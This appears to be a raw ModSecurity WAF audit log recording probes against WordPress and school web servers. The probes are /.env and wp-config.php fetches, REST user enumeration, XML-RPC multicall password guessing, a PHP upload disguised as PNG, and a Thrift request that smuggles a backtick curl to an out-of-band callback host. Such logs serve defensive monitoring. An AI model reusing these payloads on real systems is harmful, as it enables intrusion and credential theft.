Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6320d961-Z-- --4435872b-A-- [22/May/2025:12:05:32 +0700] aC6wnCektx75wRFPQyi02wAAAMY 103.236.140.4 44026 103.236.140.4 8181 --4435872b-B-- GET /.env.production HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --4435872b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4435872b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747890332344289 613 (- - -) Stopwatch2: 1747890332344289 613; combined=212, p1=176, p2=0, p3=0, p4=0, p5=36, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4435872b-Z-- --68c09060-A-- [22/May/2025:12:05:32 +0700] aC6wnCektx75wRFPQyi03AAAAMM 103.236.140.4 44034 103.236.140.4 8181 --68c09060-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --68c09060-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68c09060-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747890332459743 835 (- - -) Stopwatch2: 1747890332459743 835; combined=361, p1=260, p2=0, p3=0, p4=0, p5=101, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68c09060-Z-- --7609091d-A-- [22/May/2025:12:05:34 +0700] aC6wniektx75wRFPQyi07wAAAM0 103.236.140.4 44074 103.236.140.4 8181 --7609091d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.8 (KHTML, like Gecko) Beamrise/17.2.0.9 Chrome/17.0.939.0 Safari/535.8 Accept-Charset: utf-8 --7609091d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7609091d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747890334341635 597 (- - -) Stopwatch2: 1747890334341635 597; combined=226, p1=198, p2=0, p3=0, p4=0, p5=28, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7609091d-Z-- --1acdd55f-A-- [22/May/2025:12:39:33 +0700] aC64lWfriXjg62qQwE81UwAAAIo 103.236.140.4 53144 103.236.140.4 8181 --1acdd55f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --1acdd55f-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelAdmin@123! --1acdd55f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1acdd55f-E-- --1acdd55f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747892373663000 5118 (- - -) Stopwatch2: 1747892373663000 5118; combined=3860, p1=488, p2=3217, p3=0, p4=0, p5=91, sr=140, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1acdd55f-Z-- --9823ca33-A-- [22/May/2025:12:43:24 +0700] aC65fGfriXjg62qQwE844AAAAIU 103.236.140.4 56832 103.236.140.4 8181 --9823ca33-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --9823ca33-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelantix12! --9823ca33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9823ca33-E-- --9823ca33-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747892604045516 4235 (- - -) Stopwatch2: 1747892604045516 4235; combined=2911, p1=349, p2=2407, p3=0, p4=0, p5=91, sr=65, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9823ca33-Z-- --8cc66115-A-- [22/May/2025:12:49:17 +0700] aC663Sektx75wRFPQyjRvQAAANQ 103.236.140.4 34090 103.236.140.4 8181 --8cc66115-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html) Accept-Charset: utf-8 --8cc66115-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8cc66115-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747892957480157 773 (- - -) Stopwatch2: 1747892957480157 773; combined=334, p1=295, p2=0, p3=0, p4=0, p5=39, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cc66115-Z-- --72f2d511-A-- [22/May/2025:13:05:14 +0700] aC6-mmfriXjg62qQwE9A7wAAAIg 103.236.140.4 48696 103.236.140.4 8181 --72f2d511-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.148.31.130 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.148.31.130 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --72f2d511-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72f2d511-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747893914273998 3341 (- - -) Stopwatch2: 1747893914273998 3341; combined=1652, p1=599, p2=1016, p3=0, p4=0, p5=37, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72f2d511-Z-- --60fece5c-A-- [22/May/2025:13:22:31 +0700] aC7Cp30O04WKE1HJ5iRWfwAAAAM 103.236.140.4 36194 103.236.140.4 8181 --60fece5c-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 91.206.169.53 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 91.206.169.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --60fece5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60fece5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747894951824638 848 (- - -) Stopwatch2: 1747894951824638 848; combined=321, p1=282, p2=0, p3=0, p4=0, p5=39, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60fece5c-Z-- --3a71e90a-A-- [22/May/2025:13:36:36 +0700] aC7F9H0O04WKE1HJ5iRbywAAAAk 103.236.140.4 49002 103.236.140.4 8181 --3a71e90a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 216.172.172.35 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 216.172.172.35 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3a71e90a-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel& --3a71e90a-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a71e90a-E-- --3a71e90a-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1747895796133695 5433 (- - -) Stopwatch2: 1747895796133695 5433; combined=4017, p1=409, p2=3366, p3=27, p4=32, p5=109, sr=76, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a71e90a-Z-- --7ec42e11-A-- [22/May/2025:13:39:21 +0700] aC7GmeThJmFSRJ5-OZe6WwAAAFM 103.236.140.4 51540 103.236.140.4 8181 --7ec42e11-B-- POST /saas./resttosaasservlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 171 User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0 Content-Type: application/x-thrift X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 168483514 --7ec42e11-C-- [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl d0mbkqa4kqtm561jt3n0kbr6bmt97gt9j.oast.fun`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}] --7ec42e11-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ec42e11-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/x-thrift"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747895961123405 3107 (- - -) Stopwatch2: 1747895961123405 3107; combined=2036, p1=467, p2=1498, p3=21, p4=23, p5=26, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ec42e11-Z-- --ae58ac7c-A-- [22/May/2025:14:17:26 +0700] aC7PhuThJmFSRJ5-OZe_sgAAAFI 103.236.140.4 60308 103.236.140.4 8181 --ae58ac7c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.14.233.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.14.233.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ae58ac7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae58ac7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747898246461938 2972 (- - -) Stopwatch2: 1747898246461938 2972; combined=1365, p1=466, p2=861, p3=0, p4=0, p5=38, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae58ac7c-Z-- --bbc81e01-A-- [22/May/2025:14:18:58 +0700] aC7P4uThJmFSRJ5-OZe_xQAAAEE 103.236.140.4 60370 103.236.140.4 8181 --bbc81e01-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.0 Mobile/14G60 Safari/602.1 Accept-Charset: utf-8 --bbc81e01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbc81e01-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747898338190590 670 (- - -) Stopwatch2: 1747898338190590 670; combined=273, p1=241, p2=0, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbc81e01-Z-- --36f9af49-A-- [22/May/2025:14:19:24 +0700] aC7P_OThJmFSRJ5-OZe_xgAAAE0 103.236.140.4 60380 103.236.140.4 8181 --36f9af49-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 496 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --36f9af49-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel-123websitedev --36f9af49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36f9af49-E-- --36f9af49-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747898364166856 5634 (- - -) Stopwatch2: 1747898364166856 5634; combined=4030, p1=476, p2=3390, p3=0, p4=0, p5=97, sr=84, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36f9af49-Z-- --8e915419-A-- [22/May/2025:14:22:30 +0700] aC7QtuThJmFSRJ5-OZe_7gAAAFg 103.236.140.4 60504 103.236.140.4 8181 --8e915419-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8e915419-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelFaAdHeL@1234 --8e915419-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e915419-E-- --8e915419-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747898550908734 4928 (- - -) Stopwatch2: 1747898550908734 4928; combined=3658, p1=379, p2=3092, p3=0, p4=0, p5=110, sr=82, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e915419-Z-- --5ee62865-A-- [22/May/2025:14:23:13 +0700] aC7Q4eThJmFSRJ5-OZe__AAAAEg 103.236.140.4 60546 103.236.140.4 8181 --5ee62865-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.79.87.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.79.87.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5ee62865-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ee62865-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747898593968801 2702 (- - -) Stopwatch2: 1747898593968801 2702; combined=1230, p1=433, p2=768, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ee62865-Z-- --19d17727-A-- [22/May/2025:14:27:24 +0700] aC7R3OThJmFSRJ5-OZfAMAAAAEA 103.236.140.4 60742 103.236.140.4 8181 --19d17727-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --19d17727-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelFaadhel@pass --19d17727-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19d17727-E-- --19d17727-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747898844411591 5406 (- - -) Stopwatch2: 1747898844411591 5406; combined=3984, p1=457, p2=3360, p3=0, p4=0, p5=98, sr=90, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19d17727-Z-- --53e5ad00-A-- [22/May/2025:14:33:38 +0700] aC7TUuThJmFSRJ5-OZfAoAAAAFE 103.236.140.4 32866 103.236.140.4 8181 --53e5ad00-B-- POST /manager/teletext/material/rewrite.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 148 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 ------WebKitFormBoundaryOKldnDPT: close Content-Disposition: form-data; name="tmp_name"; filename="test.php" Content-Type: image/png X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 168576918 --53e5ad00-C-- ------WebKitFormBoundaryOKldnDPT Content-Disposition: form-data; name="uploadtime" ------WebKitFormBoundaryOKldnDPT-- --53e5ad00-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --53e5ad00-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=image/png"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747899218489270 3461 (- - -) Stopwatch2: 1747899218489270 3461; combined=2331, p1=444, p2=1724, p3=68, p4=39, p5=56, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
